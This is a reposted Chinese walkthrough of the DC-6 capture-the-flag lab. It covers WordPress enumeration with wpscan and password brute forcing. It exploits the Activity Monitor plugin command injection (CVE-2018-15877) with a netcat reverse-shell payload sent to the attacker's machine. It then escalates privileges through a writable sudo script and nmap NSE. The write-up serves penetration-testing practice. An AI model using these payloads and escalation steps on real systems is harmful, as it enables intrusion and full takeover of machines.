dc-6靶机

news2024/11/26 4:37:33

1.使用nmap进行信息搜集，存活主机，端口
192.168.85.184是存活主机，发现开放22，80端口
2.访问192.168.85.184的80端口
发现被重定向了，修改hosts文件

vim /etc/hosts
添加一行
192.168.85.174 wordy

3.对网站进行信息搜集并进行相关利用
找到一段信息
在这里插入图片描述

主要是说插件安全的问题，估计利用wordpress插件的漏洞
访问http://192.168.85.184/wp-includes，发现目录遍历，找到一些插件，尝试搜索相关漏洞利用，失败的

cms通过观察是wordpress，要知道wordpress有哪些漏洞就要知道版本
在这里插入图片描述
使用dirb对目录进行扫描

dirb http://192.168.85.184/

发现后台目录/wp-admin
尝试弱口令，失败
尝试sql注入，万能密码失败
4.使用wpscan对网站进行扫描
知道wordpress有哪些漏洞就要知道版本
扫描出版本 5.1.1，没找到漏洞
做靶机时要看一下官网描述
官网描述
在这里插入图片描述
只有一个flag，在root目录里
官网线索

主要说使用这个命令会节省你的时间
5.使用wpscan进行爆破
扫描用户名并写入user.txt

wpscan --url http://192.168.85.184 -e u

在这里插入图片描述
5个用户名写入user.txt
admin
mark
graham
sarah
jens
密码字典

gunzip rockyou.txt.gz           #解压
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破

wpscan --url http://192.168.85.184 -U user.txt -P pass.txt

用户名 mark
密码 helpdesk01
在这里插入图片描述
6.登录后台，寻找可以利用点
登录成功
在一些wordpress版本中，是可以上传插件和主题的，可以在这个地方直接上传一句话木马，注意上传插件时可能会失败，但是当你查看文件时时上传成功的，因为上传插件时是先上传在解压安装的，之后可以在msf的php或linux马继续上线，进行下一步操作
没有发现上传的位置
在这里插入图片描述

发现一个插件，搜索相关漏洞
找到CVE-2018-15877，是命令执行漏洞

7.利用cve-2018-15877
在 Activity Monito的tools处有命令执行
在这里插入图片描述
在3处输入命令，在4处点击执行，3处有长度限制，f12修改最大长度
有两个思路
写一句话木马
反弹shell
写一句话木马失败，可能是权限问题
3处反弹shell

127.0.0.1|nc -e /bin/bash 192.168.85.129 4455

kali nc监听

nc -lvnp 4455
python进入交互式会话
python -c ’import pty；pty.spawn("/bin/bash")'

成功反弹
在这里插入图片描述
8.对主机进行信息搜集，进行提权
查看内核版本，版本是4.0的版本，太高没有找到漏洞

uname -a

当前权限www-data
把有权限的地方都看一看
进入家目录
进入到jens的家目录，发现一个备份backups.sh,查看内容，是打包web根目录下的文件
在这里插入图片描述
这个地方想到了linux提权中的打包提权，查看权限是jens权限，不是root权限
查找suid权限，发现sudo

sudo -l #查看当前用户的一些sudo权限

继续搜集
进入mark家目录，发现graham密码
在这里插入图片描述
username:graham
passwd:GSo7isUM1D4
9.使用graham用户登录ssh或su 切换用户
ssh 192.168.85.184 -l graham
GSo7isUM1D4

执行下面命令发现可以jens执行backups.sh

sudo -l

在这里插入图片描述
可以不需要jens密码以jens权限执行backups.sh

当写入赋予find的s权限，在作为打包命令执行的参数执行前面的命令执行时，是不能执行的，因为sudo文件的一些命令被禁止了以root权限执行
在这里插入图片描述
有一个思路看一下其他用户登录时sudo -l可以执行什么，但是使用前面搜集的两个密码登录都失败了
还有一个思路可以写入/bin/bash,sudo可以切换到jens用户

echo '/bin/bash'>>/home/jens/backups.sh
#sudo -u以指定用户执行
sudo -u jens ./home/jens/backups.sh

成功切换到jens用户
在这里插入图片描述
10.nmap提权
执行以下命令，发现可以不需要密码以root执行nmap命令

sudo -l

在这里插入图片描述
写一个bash，以root权限执行

echo 'os.execute('/bin/bash')' >1.nse
sudo nmap --script=1.nse
id

在这里插入图片描述
参考文章：
dc-6

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/475665.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

dc-6靶机

相关文章

彻底解决 Lost connection to MySQL server at ‘reading initial communication packet’, system error: 0 解决方法

C的文件操作

Shiro相关知识

CSS布局基础（标签类型，盒子模型）

【进阶C语言】动态版通讯录的实现（详细讲解+全部码源）

Linux基础IO【重定向及缓冲区理解】

Java数组的学习（基础）

Python程序员想要转行，可以从这几个方面着手

《Netty》从零开始学netty源码（四十七）之PooledByteBuf的方法

Zabbix部署详解

【华为OD机试真题】信号发射和接收（javaC++python）100%通过率超详细代码注释

unity-VRTK-simulator开发学习日记2（抛物线导包|使用|调用方法）

Doris（20）：Doris的函数—数学函数

【五一创作】使用Scala二次开发Spark3.3.0实现对MySQL的upsert操作

能上网的ChatGPT，会带来什么改变

AIGC提词生成图片(人物照片)练习笔记

Qt MSVC开发

Packet Tracer - 配置 RIPv2

【LeetCood206】反转链表

【细读Spring Boot源码】监听器合集-持续更新中